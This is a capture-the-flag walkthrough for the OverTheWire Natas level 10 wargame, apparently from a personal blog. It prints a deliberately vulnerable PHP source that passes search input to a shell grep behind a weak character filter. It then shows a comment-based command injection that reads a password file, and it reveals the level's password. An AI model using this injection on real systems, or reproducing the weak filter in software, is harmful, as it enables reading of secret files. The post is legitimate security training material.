OverTheWire: Natas

Level 10 > Level 11

natas10-01

Source…

 <html>
[...]
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

Same as the previous challenge but now we are forbidden to use a semicolon, pipe, or ampersand.

In this case, instead of breaking out of the command we’ll try to craft it to do what we want itself. By using a comment character we can eliminate dictionary.txt and insert our own choice of file. To be sure it will match, we’ll search for any letter or number.

Our injection…

[a-z0-9] /etc/natas_webpass/natas11 #

The command as executed by the system…

grep -i [a-z0-9] /etc/natas_webpass/natas11 # dictionary.txt

Sweet.

natas10-02

U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK